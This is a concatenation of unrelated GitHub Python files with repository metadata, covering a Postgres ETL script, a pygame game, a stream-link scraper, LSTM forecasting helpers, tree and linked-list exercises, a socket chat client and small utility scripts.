t['ts'].dt.day\n t['week'] = t['ts'].dt.week\n t['weekday_name'] = t['ts'].dt.weekday_name\n t['month'] = t['ts'].dt.month\n t['year'] = t['ts'].dt.year\n \n # insert time data records\n time_data = ('ts', 'hour', 'day', 'week', 'month', 'year', 'weekday_name')\n column_labels = ('start_time', 'hour', 'day', 'week', 'month', 'year', 'weekday')\n time_df = t[['ts', 'hour', 'day', 'week', 'month', 'year', 'weekday_name']]\n\n for i, row in time_df.iterrows():\n cur.execute(time_table_insert, list(row))\n\n # load user table\n user_df = df[['userId', 'firstName', 'lastName', 'gender', 'level']]\n\n # insert user records\n for i, row in user_df.iterrows():\n cur.execute(user_table_insert, row)\n\n # insert songplay records\n for index, row in df.iterrows():\n \n # get songid and artistid from song and artist tables\n cur.execute(song_select, (row.song, row.artist, row.length))\n results = cur.fetchone()\n \n if results:\n songid, artistid = results\n else:\n songid, artistid = None, None\n\n # insert songplay record\n songplay_data = (row.ts, row.userId, row.level, songid, artistid, row.itemInSession, row.location, row.userAgent)\n cur.execute(songplay_table_insert, songplay_data)\n\n\n\ndef process_data(cur, conn, filepath, func):\n \"\"\"\n Description: This function is responsible for looping over all the JSON files in the data directories, calculating the total number of files found\n and applying the func function to all the files listed for the transformation and database insetion purposes.\n\n Arguments:\n cur: the cursor object.\n conn: connection to the database.\n filepath: log data or song data file path.\n func: function that transforms the data and inserts it into the database.\n\n Returns:\n None\n \"\"\"\n \n # get all files matching extension from directory\n all_files = []\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root,'*.json'))\n for f in files :\n all_files.append(os.path.abspath(f))\n\n # get total number of files found\n num_files = len(all_files)\n print('{} files found in {}'.format(num_files, filepath))\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n func(cur, datafile)\n conn.commit()\n print('{}/{} files processed.'.format(i, num_files))\n\n\ndef main():\n conn = psycopg2.connect(\"host=127.0.0.1 dbname=sparkifydb user=student password=student\")\n cur = conn.cursor()\n\n process_data(cur, conn, filepath='data/song_data', func=process_song_file)\n process_data(cur, conn, filepath='data/log_data', func=process_log_file)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"MustafaAwny/Sparkify-Data-Modeling-with-Postgres-SQL","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34361227260","text":"import sys, math, itertools\nfrom collections import deque, defaultdict, Counter\nsys.setrecursionlimit(10**9)\ndef LI(): return [int(x) for x in sys.stdin.readline().split()]\n\nX = LI()\nX.sort()\nA, B, C = X\n\nif C % 2 == 0:\n print(0)\nelse:\n print(A * B)\n\n\n\n","repo_name":"hk-tech/atcoder","sub_path":"problems/agc004/a/submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4137508992","text":"import pygame\nimport random\nimport math\n\n# Initialize pygame\npygame.init()\n\n# Create game screen\nscreen = 
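The time-feature block in `etl.py` leans on the pandas `.dt` accessor; note that `Series.dt.weekday_name` was removed in pandas 1.0 in favor of `dt.day_name()`, so on current pandas the equivalent sketch is:

```python
import pandas as pd

df = pd.DataFrame({"ts": [1541121934796, 1541122241796]})
df["ts"] = pd.to_datetime(df["ts"], unit="ms")  # epoch ms -> Timestamp
# the .dt accessor exposes the per-timestamp fields used for the time table
df["hour"] = df["ts"].dt.hour
df["weekday"] = df["ts"].dt.day_name()  # modern spelling of weekday_name
print(df)
```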
pygame.display.set_mode((800, 600))\n\n# Background\nbackground = pygame.image.load(\"background.png\")\n\n# Title and Icon\npygame.display.set_caption(\"Space Invaders\")\nicon = pygame.image.load(\"icon.png\")\npygame.display.set_icon(icon)\n\n# Player\nplayerImg = pygame.image.load(\"player.png\")\nplayer_x = 370\nplayer_y = 480\nplayer_move = 0\n\n# Enemy\nenemyImg = pygame.image.load(\"enemy.png\")\nenemy_x = random.randint(0, 720)\nenemy_y = random.randint(50, 150)\nenemy_x_move = 2\nenemy_y_move = 20\n\n# Bullet\n\n# Ready - bullet is unseen\n# Fire - bullet is moving\nbulletImg = pygame.image.load(\"bullet.png\")\nbullet_x = 0\nbullet_y = 480\nbullet_x_move = 0\nbullet_y_move = 3\nbullet_state = \"ready\"\n\nscore = 0\n\n# Allows a player to appear on screen\ndef player(x, y):\n    screen.blit(playerImg, (x, y))\n\n\n# Allows the enemy to appear on screen\ndef enemy(x, y):\n    screen.blit(enemyImg, (x, y))\n\n\ndef fire_bullet(x, y):\n    global bullet_state\n    bullet_state = \"fire\"\n    screen.blit(bulletImg, (x + 16, y + 10))\n\n\ndef isCollision(enemy_x, enemy_y, bullet_x, bullet_y):\n    distance = math.sqrt((math.pow(enemy_x - bullet_x, 2)) + (math.pow(enemy_y - bullet_y, 2)))\n    if distance < 27:\n        return True\n    else:\n        return False\n\n\n# Game Loop\nrunning = True\nwhile running:\n\n    # RGB values\n    screen.fill((255, 255, 255))\n    # Background image\n    screen.blit(background, (0, 0))\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            running = False\n\n        # If Keystroke is pressed check whether it's right or left\n        if event.type == pygame.KEYDOWN:\n            if event.key == pygame.K_LEFT:\n                player_move = -5\n\n            if event.key == pygame.K_RIGHT:\n                player_move = 5\n\n            if event.key == pygame.K_SPACE:\n                if bullet_state == \"ready\":\n                    bullet_x = player_x\n                    fire_bullet(bullet_x, bullet_y)\n\n        # This loop tells the game what to do when a key is released\n        if event.type == pygame.KEYUP:\n            # the original test \"event.key == pygame.K_LEFT or pygame.K_RIGHT\" was always truthy\n            if event.key in (pygame.K_LEFT, pygame.K_RIGHT):\n                player_move = 0\n    # Checking for player boundary to prevent out of bounds movement\n    player_x += player_move\n\n    if player_x <= 16:\n        player_x = 16\n    elif player_x >= 720:\n        player_x = 720\n\n    # Enemy Movement\n    enemy_x += enemy_x_move\n\n    if enemy_x <= 16:\n        enemy_x_move = 2\n        enemy_y += enemy_y_move\n    elif enemy_x >= 720:\n        enemy_x_move = -2\n        enemy_y += enemy_y_move\n\n    # Bullet movement\n    if bullet_y <= 0:\n        bullet_y = 480\n        bullet_state = \"ready\"\n\n    if bullet_state == \"fire\":\n        fire_bullet(bullet_x, bullet_y)\n        bullet_y -= bullet_y_move\n\n    # Collision\n    collision = isCollision(enemy_x, enemy_y, bullet_x, bullet_y)\n    if collision:\n        bullet_y = 480\n        bullet_state = \"ready\"\n        score += 1\n        print(score)\n        enemy_x = random.randint(0, 800)\n        enemy_y = random.randint(50, 150)\n\n    player(player_x, player_y)\n    enemy(enemy_x, enemy_y)\n    pygame.display.update()\n","repo_name":"BrianGitahi/SpaceInvaders-Notfinished-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20608664131","text":"\"\"\"Code for scraping from RojaDirecta.\"\"\"\nimport logging\nimport time\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom streamscrape.utils import get_ip_address\n\nlogger = logging.getLogger(__name__)\n\nHOME = \"http://www.rojadirecta.me\"\n\n\ndef scrape():\n    \"\"\"Scrape RojaDirecta.\n\n    :return: A list of {\"timestamp\": _, \"url\": _, \"ip\": _}\n    \"\"\"\n    all_urls = []\n    page = requests.get(HOME)\n    soup = 
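`isCollision` above calls `math.sqrt` every frame; comparing squared distances gives the same boolean answer without the root. A small sketch of that common variant:

```python
def is_collision(ex, ey, bx, by, radius=27):
    # squared-distance comparison is equivalent to sqrt(...) < radius
    dx, dy = ex - bx, ey - by
    return dx * dx + dy * dy < radius * radius

print(is_collision(100, 100, 110, 110))  # True: distance ~14.1 < 27
```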
BeautifulSoup(page.text, \"html.parser\")\n    url_table = soup.find(\"div\", id=\"agendadiv\")\n    for a in url_table.find_all(\"a\"):\n        try:\n            href = a.attrs[\"href\"]\n        except KeyError:\n            continue\n\n        # skip p2p acestream urls\n        if any(s in href for s in [\"rojadirecta.me\", \"elgoles.me\", \"arenavision.link\"]):\n            continue\n\n        # Go to the actual URL if rojadirecta wants to redirect\n        if href.startswith(\"http://it.rojadirecta.eu/goto/http\"):\n            href = href.replace(\"http://it.rojadirecta.eu/goto/\", \"\")\n        elif href.startswith(\"http://it.rojadirecta.eu/goto/\"):\n            href = href.replace(\"it.rojadirecta.eu/goto/\", \"\")\n\n        event_data = {\n            \"timestamp\": int(time.time()),\n            \"url\": href,\n            \"ip\": get_ip_address(href),\n        }\n        logger.debug(\"RojaDirecta URL data: {}\".format(event_data))\n        all_urls.append(event_data)\n\n    return all_urls\n","repo_name":"hudson-ayers/safe-sports-streams","sub_path":"src/streamscrape/other/rojadirecta.py","file_name":"rojadirecta.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38276869207","text":"# Read three integers a, b, c and check which of them is the largest. Depending on the result,\n# display the appropriate message. Use nested conditionals.\n\ndef get_number_from_user():\n    while True:\n        user_input = input()\n        try:\n            value = float(user_input)\n            return value\n        except ValueError:\n            print(\"You entered an invalid value. Please enter a number again\")\n\n\nprint(\"Enter number a: \")\na = get_number_from_user()\nprint(\"Enter number b: \")\nb = get_number_from_user()\nprint(\"Enter number c: \")\nc = get_number_from_user()\n\nif a == b and b == c:\n    print('All the numbers are equal')\nelif a >= b:\n    if a > c:\n        print('Number a is the largest')\n    else:\n        print('Number c is the largest')\nelif b > a:\n    if b > c:\n        print('Number b is the largest')\n    else:\n        print('Number c is the largest')\n","repo_name":"mohawk76/WizualizacjaDanych2022","sub_path":"lab2/zad 6.py","file_name":"zad 6.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70453658066","text":"print(\"**EXAMPLE 3**\")\nclass apellidos:\n    def __init__(self, apellido1, apellido2):\n        self.apellido1 = apellido1\n        self.apellido2 = apellido2\n\n\nclass profesor:\n    sueldoTotal = 0\n    def __init__(self, nombre, sueldo, horasExtra, apellidos):\n        self.nombre = nombre\n        self.sueldo = sueldo\n        self.horasExtra = horasExtra\n        self.apellidos = apellidos\n\n    def calcularSueldoTotal(self):\n        self.sueldoTotal = self.sueldo + (self.horasExtra * 11)\n    \n\ndef main():\n    nombre = \"Arancha Estrella\"\n    sueldo = 600\n    horasExtra = 10\n    apellidosProfesor = apellidos(\"Rosillo\", \"Andagua\")\n    # pass the apellidos instance, not the class itself\n    profesor1 = profesor(nombre, sueldo, horasExtra, apellidosProfesor)\n    profesor1.calcularSueldoTotal()\n    print(f\"\\nProfessor {nombre} {apellidosProfesor.apellido1} {apellidosProfesor.apellido2} has a salary of {sueldo} dollars; counting overtime hours it rises to {profesor1.sueldoTotal} dollars\\n\")\n    \nif __name__ == '__main__':\n    main()","repo_name":"ProgOrientadaObjetos-PPA-AA2022/consulta01-grupo006","sub_path":"Ejercicios/Ejemplo3.py","file_name":"Ejemplo3.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14063423321","text":"def linked_list_cycle(head):\n    \n    if not head:\n        return False\n    \n    slow = head\n    
fast = head\n \n while not (fast is None or fast.next is None): # understand this properly. you want to fail in the first condition \n #to prevent 2nd condition from executing to prevent None type exception\n #while fast is not None or fast.next is not None: # this is not a correct condition\n slow = slow.next\n fast = fast.next.next \n if slow == fast:\n return True\n return False\n\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\na = Node('a')\nb = Node('b')\nc = Node('c')\nd = Node('d')\n\na.next = b\nb.next = c\nc.next = d\n\n# a -> b -> c -> d \n\nlinked_list_cycle(a) # Fals","repo_name":"anilsalgaonkar/interviewing","sub_path":"Coding/Linked List/hascycle.py","file_name":"hascycle.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40050367377","text":"import os\nimport time\n\nfrom timeseries.plotly.plot import plot_history\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nfrom timeseries.experiments.lorenz.functions.dataprep import split_mv_seq_multi_step\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, Dense\nfrom numpy import array\n\n\ndef lstm_multi_step_mv_build(cfg, n_features):\n n_input, n_steps_out, n_nodes = cfg['n_steps_in'], cfg['n_steps_out'], cfg['n_nodes']\n model = Sequential()\n # model.add(LSTM(50, activation='relu', return_sequences=True, input_shape=(n_input, 1)))\n # model.add(LSTM(50, activation='relu'))\n model.add(LSTM(n_nodes, activation='relu', input_shape=(n_input, n_features), return_sequences=False))\n model.add(Dense((n_nodes + n_steps_out) // 2 + n_steps_out, activation='relu'))\n model.add(Dense(n_steps_out))\n model.compile(loss='mse', optimizer='adam')\n return model\n\n\ndef lstm_multi_step_mv_fit(train, cfg, plot_hist=False, verbose=0):\n n_input, n_steps_out = cfg['n_steps_in'], cfg['n_steps_out']\n n_epochs, n_batch = cfg['n_epochs'], cfg['n_batch']\n # prepare data\n X, y = split_mv_seq_multi_step(train, n_input, n_steps_out)\n n_features = X.shape[2]\n # define model\n model = lstm_multi_step_mv_build(cfg, n_features)\n # fit\n start_time = time.time()\n history = model.fit(X, y, epochs=n_epochs, batch_size=n_batch, verbose=verbose)\n train_time = round((time.time() - start_time), 2)\n if plot_hist:\n plot_history(history, title='CNN-LSTM: ' + str(cfg), plot_title=True)\n return model, train_time, history.history['loss'][-1]\n\n\n# forecast with a pre-fit model\ndef lstm_multi_step_mv_predict(model, history, cfg, steps=1):\n # unpack architectures\n n_input = cfg['n_steps_in']\n n_features = history.shape[1]\n # prepare data\n x_input = array(history[-n_input:]).reshape((1, n_input, n_features))\n # forecast\n yhat = model.predict(x_input, verbose=0)\n return yhat[0]\n\n\ndef lstm_get_multi_step_mv_funcs():\n return [lstm_multi_step_mv_predict, lstm_multi_step_mv_fit, lstm_multi_step_mv_build]\n","repo_name":"samlopezruiz/CodeProjectTimeSeries","sub_path":"src/timeseries/experiments/lorenz/multivariate/multistep/lstm/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8126701061","text":"#!/usr/bin/env python\n\"\"\"\n Created by ZhuYB at 2022/11/16\n\"\"\"\n# Given an integer n, return all the structurally unique BST's (binary search trees),'\n# which has exactly n nodes of unique values from 1 to n. 
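`hascycle.py` above only exercises the acyclic case. A self-contained positive check of the same fast/slow pointer idea, with the loop condition written in its non-negated form:

```python
class Node:
    def __init__(self, val):
        self.val = val
        self.next = None

def has_cycle(head):
    slow = fast = head
    # advance fast two steps per slow step; equal pointers mean a cycle
    while fast is not None and fast.next is not None:
        slow, fast = slow.next, fast.next.next
        if slow is fast:
            return True
    return False

a, b, c = Node('a'), Node('b'), Node('c')
a.next, b.next, c.next = b, c, a  # c -> a closes the loop
print(has_cycle(a))  # True
```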
Return the answer in any order.\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution(object):\n def generateTrees(self, n):\n \"\"\"\n :type n: int\n :rtype: List[TreeNode]\n \"\"\"\n return self.helper(1, n)\n\n def helper(self, start, end):\n if start > end:\n return [None]\n\n trees = []\n for root_val in range(start, end+1):\n left_subtrees = self.helper(start, root_val-1)\n right_subtrees = self.helper(root_val+1, end)\n for left in left_subtrees:\n for right in right_subtrees:\n curr_root = TreeNode(root_val)\n curr_root.left = left\n curr_root.right = right\n\n trees.append(curr_root)\n return trees\n \n# class Solution:\n# def generateTrees(self, n: int) -> List[Optional[TreeNode]]:\n\n# @cache\n# def generate_trees(l, r):\n# if l > r:\n# return [None]\n \n# cur = []\n# for i in range(l, r+1):\n# for left in generate_trees(l, i-1):\n# for right in generate_trees(i+1, r):\n# cur.append(TreeNode(i, left, right))\n# return cur\n \n# return generate_trees(1, n)\n","repo_name":"YingbingZhu/python_leetcode","sub_path":"tree/95. Unique Binary Search Trees II.py","file_name":"95. Unique Binary Search Trees II.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11984879297","text":"from pynput import mouse\n\nfrom modules.gui import GuiApp\nfrom modules.mouse_monitoring import MouseMonitoringSingleton\n# inside this box the will be made screenshot\n# cursor inside this box will be in center\nfrom modules.window_screen_worker import WindowScreenWorker\n\n\n# mouse onclick handler\ndef on_click_handler(x, y, button, pressed):\n if pressed and button == mouse.Button.right:\n screenshot_img = WindowScreenWorker().getWindowScreenshot()\n r, g, b = screenshot_img.getpixel((x, y))\n\n rgb_str = f\"{r}, {g}, {b}\"\n hex_str = \"#{:02x}{:02x}{:02x}\".format(r, g, b)\n\n GuiApp.observer_obj.pixel_hex_color = hex_str\n GuiApp.observer_obj.pixel_rgb_color = rgb_str\n GuiApp.observer_obj.updateLabels()\n GuiApp.observer_obj.rgb_color = [r, g, b]\n\n\ndef main():\n gui_obj = GuiApp()\n\n # start monitoring the mouse\n mouse_obj = MouseMonitoringSingleton()\n mouse_obj.startMonitoring(on_click_handler)\n\n gui_obj.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rabo452/colorpicker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69815154386","text":"class newNode: \n def __init__(self, data): \n self.data = data \n self.left = self.right = None\n \n# Returns true if trees with root1\n# and root2 are level by level \n# anagram, else returns false. \ndef areAnagrams(root1, root2) :\n \n # Base Cases \n if (root1 == None and root2 == None) :\n return True\n if (root1 == None or root2 == None) :\n return False\n \n # start level order traversal of \n # two trees using two queues. \n q1 = []\n q2 = [] \n q1.append(root1) \n q2.append(root2) \n \n while (1) :\n \n # n1 (queue size) indicates number \n # of Nodes at current level in first\n # tree and n2 indicates number of nodes\n # in current level of second tree. 
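Two levels can only be anagrams of each other when these counts match.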
\n n1 = len(q1)\n n2 = len(q2)\n \n # If n1 and n2 are different \n if (n1 != n2):\n return False\n \n # If level order traversal is over \n if (n1 == 0): \n break\n \n # Dequeue all Nodes of current level \n # and Enqueue all Nodes of next level\n curr_level1 = []\n curr_level2 = []\n while (n1 > 0): \n node1 = q1[0] \n q1.pop(0) \n if (node1.left != None) :\n q1.append(node1.left) \n if (node1.right != None) :\n q1.append(node1.right) \n n1 -= 1\n \n node2 = q2[0] \n q2.pop(0) \n if (node2.left != None) :\n q2.append(node2.left) \n if (node2.right != None) :\n q2.append(node2.right) \n \n curr_level1.append(node1.data) \n curr_level2.append(node2.data) \n \n # Check if nodes of current levels \n # are anagrams or not. \n curr_level1.sort() \n curr_level2.sort() \n if (curr_level1 != curr_level2) :\n return False\n \n return True\n \n# Driver Code \nif __name__ == '__main__':\n \n # Constructing both the trees. \n root1 = newNode(1) \n root1.left = newNode(3) \n root1.right = newNode(2) \n root1.right.left = newNode(5) \n root1.right.right = newNode(4) \n \n root2 = newNode(1) \n root2.left = newNode(2) \n root2.right = newNode(3) \n root2.left.left = newNode(4) \n root2.left.right = newNode(5) \n if areAnagrams(root1, root2):\n print(\"Yes\") \n else: \n print(\"No\")\n","repo_name":"DDR7707/Final-450-with-Python","sub_path":"Stacks and Queues/329.Check if all levels are anagram.py","file_name":"329.Check if all levels are anagram.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"23774654250","text":"import threading\nimport socket\n\n\nIP = '127.0.0.1'\nPORT = 9999\nDISCONNECTION_MESSAGE = '*'\n\n\nclass Client:\n def __init__(self, IP, PORT):\n self.IP = IP\n self.PORT = PORT\n self.client = self.initialize_client(self.IP, self.PORT)\n print('Client is up and ready!!')\n self.recieve_thread = threading.Thread(target = self.recieve)\n self.recieve_thread.start()\n\n self.write_thread = threading.Thread(target = self.write)\n self.write_thread.start()\n\n def initialize_client(self, IP, PORT):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.connect((IP, PORT))\n return client\n\n\n def recieve(self):\n while True:\n try:\n message = self.client.recv(1024).decode()\n print(message)\n except:\n print('Something went wrong...')\n self.client.close()\n break\n\n def write(self):\n while True:\n message = input('')\n self.client.send(message.encode())\n if message == DISCONNECTION_MESSAGE:\n self.client.close()\n break\n\n\n\n\nalmog = Client(IP, PORT)","repo_name":"almog674/Network-projects","sub_path":"task 12.5/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25803441431","text":"import csv\nimport sys\n\nfrom roboko_message.roboko_message import roboko\n\ndef file_create():\n try:\n with open(roboko.csv_path,'x', encoding = 'utf-8') as f:\n return 0\n except FileExistsError as e:\n return 1\n \ndef file_read(flag):\n if flag == 1:\n with open(roboko.csv_path) as csvfile:\n reader = csv.reader(csvfile)\n csvlist = [[]]\n csvlist = [row for row in reader]\n csvlist.sort(reverse = True)\n print(csvlist)\n for i in range(len(csvlist)):\n print(roboko.roboko_like_resutaurant + csvlist[i][0] + 'です。')\n print(roboko.do_you_like_resutaurant)\n user_like = input()\n if user_like.lower() == 'yes' or user_like.lower() == 'y':\n break\n 
elif user_like.lower() == 'no' or user_like.lower() == 'n':\n pass\n else:\n print('入力されている文字が違います。[Yes/No]')\n continue\n return csvlist\n elif flag == 0:\n pass\n else:\n sys.exit()\n\n\ndef file_write(resutaurant):\n with open(roboko.csv_path,'a') as f:\n f.write(resutaurant.title() + ',1' + '\\n')\n\ndef file_rewrite(csvlist):\n with open(roboko.csv_path,'w') as f:\n for i in range(len(csvlist)):\n f.write(csvlist[i][0].title() + ',' + str(csvlist[i][1]) + '\\n')\n\ndef file_control(csvlist,resutaurant):\n for i in range(len(csvlist)):\n if csvlist[i][0] == resutaurant.title():\n csvlist[i][1] = int(csvlist[i][1]) + 1\n break\n elif i == (len(csvlist) -1 ):\n return csvlist,0\n else:\n pass\n return csvlist,1\n\ndef main():\n flag = file_create()\n print(roboko.hello_message + roboko.who_are_you) \n user_name = input()\n csvlist = file_read(flag)\n print(user_name + roboko.where_restaurant_like)\n resutaurant = input()\n if flag == 1:\n csvlist,write_flag = file_control(csvlist,resutaurant)\n if write_flag == 1:\n file_rewrite(csvlist)\n else:\n file_write(resutaurant)\n else:\n file_write(resutaurant)\n\n print(user_name + roboko.thank_you)\n print(roboko.goodby_message)\n\nif __name__ == '__main__':\n main()\n","repo_name":"sakurasan0904/RobokoMessage","sub_path":"roboko_application.py","file_name":"roboko_application.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7352118172","text":"#!/usr/bin/env python3\r\n\r\nfrom datetime import datetime, time, timedelta\r\n\r\ndef main():\r\n print(\"The Timer program\")\r\n print()\r\n\r\n # start timer\r\n input(\"Press Enter to start...\")\r\n start_time = datetime.now()\r\n current_time = start_time.strftime(\"%H:%M:%S\")\r\n print(\"Start time:\", current_time)\r\n print()\r\n \r\n # stop timer\r\n input(\"Press Enter to stop...\") \r\n stop_time = datetime.now()\r\n current_time2 = stop_time.strftime(\"%H:%M:%S\")\r\n print(\"Stop time: \", current_time2)\r\n print()\r\n\r\n # calculate elapsed time\r\n elapsed_time = stop_time - start_time\r\n days = elapsed_time.days\r\n minutes = elapsed_time.seconds // 60\r\n seconds = elapsed_time.seconds % 60\r\n microseconds = elapsed_time.microseconds\r\n hours = minutes // 60\r\n minutes = minutes % 60\r\n\r\n # create time object\r\n time_object = time(hours, minutes, seconds, microseconds)\r\n\r\n # display results\r\n print(\"ELAPSED TIME\")\r\n \r\n if days > 0:\r\n print(\"Days:\", days)\r\n print(\"Hours/minutes: \" + str(hours) + \":\" + str(minutes))\r\n print (\"Seconds: \" + str(seconds) + \".\" + str(microseconds))\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"22peasel/2.2-lab","sub_path":"timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70500906066","text":"import os.path\nimport pandas as pd\n\n# read training accuracy from mixed test files\nsourcedata_dir = r'/mnt/workdir/DCM/sourcedata'\nsub_list = [f'sub_{str(s).zfill(3)}' for s in range(238,250)]\nsub_list.reverse()\nsub_mix_acc = pd.DataFrame({})\nfor sub in sub_list:\n print(sub)\n mix_test_dir = os.path.join(sourcedata_dir,sub,'Behaviour','mixed_test')\n try:\n mix_test_files = os.listdir(mix_test_dir)\n for f in mix_test_files:\n if '.csv' in f:\n try:\n tmp_df = pd.read_csv(os.path.join(mix_test_dir,f))\n id = tmp_df['participant'][0]\n name = tmp_df['姓名'][0]\n 
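# '姓名' is the Chinese column header for the participant's name; the best (max) accuracy of each test type is taken next\n                    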
ap_acc = tmp_df['ap_acc'].max()\n                    dp_acc = tmp_df['dp_acc'].max()\n                    time = tmp_df['date'][0]\n                    sub_mix_acc = sub_mix_acc.append({'sub_id':sub,'exp_id':id,\n                                                      'name':name,'AP':ap_acc,'DP':dp_acc,\n                                                      'time':time},ignore_index=True)\n                except:\n                    print(f\"The file {f} of {sub} has bugs.\")\n    except:\n        print(f\"The {sub} doesn't have the directory.\")\n\n\n#%%\n# split the mix_offline performance into the 2 columns: train_ap; train_dp\ndata = pd.read_csv(r'/mnt/workdir/DCM/tmp/participants.tsv',sep='\\t')\ndata_part1 = data[:235]\ndata_part2 = data[235:]\nmix_offline_acc = data_part2['mix_offline']\n\ntrain_ap = []\ntrain_dp = []\ni = 205\nfor acc in mix_offline_acc:\n    print(i)\n    ap_acc,dp_acc = acc.split('/')\n    train_ap.append(float(ap_acc))\n    train_dp.append(float(dp_acc))\n    i+=1\n\ndata_part2['train_ap'] = train_ap\ndata_part2['train_dp'] = train_dp\n\nnew_data = pd.concat([data_part1,data_part2])\nnew_data.to_csv(r'/mnt/workdir/DCM/tmp/participants.tsv',sep='\\t')\n\n\n#%%\n# check data for mixed test performance\nbeha_total_score = r'/mnt/workdir/DCM/tmp/participants.tsv'\ndata = pd.read_csv(beha_total_score,sep='\\t')\n\nequal_state = pd.DataFrame()\nfor index,sub_acc in sub_mix_acc.iterrows():\n    sub_ap_acc = sub_acc['AP']\n    sub_dp_acc = sub_acc['DP']\n    sub_id = sub_acc['sub_id'].replace(\"_\",'-')\n    sub_record_ap_acc = data[data['Participant_ID']==sub_id]['train_ap'].values[0]\n    sub_record_dp_acc = data[data['Participant_ID']==sub_id]['train_dp'].values[0]\n    age = data[data['Participant_ID']==sub_id]['Age'].values[0]\n    time = sub_acc['time']\n    if (sub_ap_acc==sub_record_ap_acc) and (sub_dp_acc==sub_record_dp_acc):\n        equal_state = equal_state.append({'sub_id':sub_id,'state':'equal',\n                                          'data_ap':sub_ap_acc,'data_dp':sub_dp_acc,\n                                          'doc_ap':sub_record_ap_acc,'doc_dp':sub_record_dp_acc,\n                                          'Age':age,'time':time},\n                                         ignore_index=True)\n    else:\n        if sub_id in equal_state['sub_id'].to_list():\n            continue\n        else:\n            equal_state = equal_state.append({'sub_id':sub_id,'state':'not equal',\n                                              'data_ap':sub_ap_acc,'data_dp':sub_dp_acc,\n                                              'doc_ap':sub_record_ap_acc,'doc_dp':sub_record_dp_acc,\n                                              'Age':age,'time':time},\n                                             ignore_index=True)\n","repo_name":"YukunQu/DCM","sub_path":"analysis/behaviour/mixtest_acc.py","file_name":"mixtest_acc.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69968483666","text":"f = open('/home/kwanghyun_su/pk_base_usage.txt')\n\nfnNames = []\n\n\"\"\"\ntest = 'sadasd base::hi'\npos = test.find('//')\nbp = test.find('base::')\nprint('pos is' + str(pos))\nprint('bp is' + str(bp))\n\"\"\"\n\n\n\nfor line in f :\n    pos1 = line.find('base::')\n    commentPos = line.find('//')\n    if commentPos != -1 and commentPos < pos1 :\n        continue\n\n    qtPos = line.find('\\\"')\n    if qtPos != -1 and qtPos < pos1 :\n        continue\n\n    unittestPos = line.find('unittest')\n    if unittestPos != -1 :\n        print(\"Found unittest. Continuing...\", line)\n        continue\n\n    if pos1 == -1 :\n        print(\"found outlier\")\n        print(pos1, \", \", line)\n        continue\n\n    pos2 = len(line) # Begin with the length of the current line\n\n    blankPos = line.find(' ', pos1)\n    if blankPos != -1 and blankPos < pos2 :\n        pos2 = blankPos\n\n    openParenPos = line.find('(', pos1)\n    if openParenPos != -1 and openParenPos < pos2 :\n        pos2 = openParenPos\n\n    closeParenPos = line.find(')', pos1)\n    if closeParenPos != -1 and closeParenPos < pos2 :\n        pos2 = closeParenPos\n\n    ampPos = line.find('&', pos1)\n    if ampPos != -1 and ampPos < pos2 :\n        pos2 = ampPos\n\n    asteriskPos = line.find('*', pos1)\n    if asteriskPos != -1 and asteriskPos < pos2 :\n        pos2 = asteriskPos\n\n    commaPos = line.find(',', pos1)\n    if commaPos != -1 and commaPos < pos2 :\n        pos2 = commaPos\n\n    semiColonPos = line.find(';', pos1)\n    if semiColonPos != -1 and semiColonPos < pos2 :\n        pos2 = semiColonPos\n\n    openBracketPos = line.find('<', pos1)\n    if openBracketPos != -1 and openBracketPos < pos2 :\n        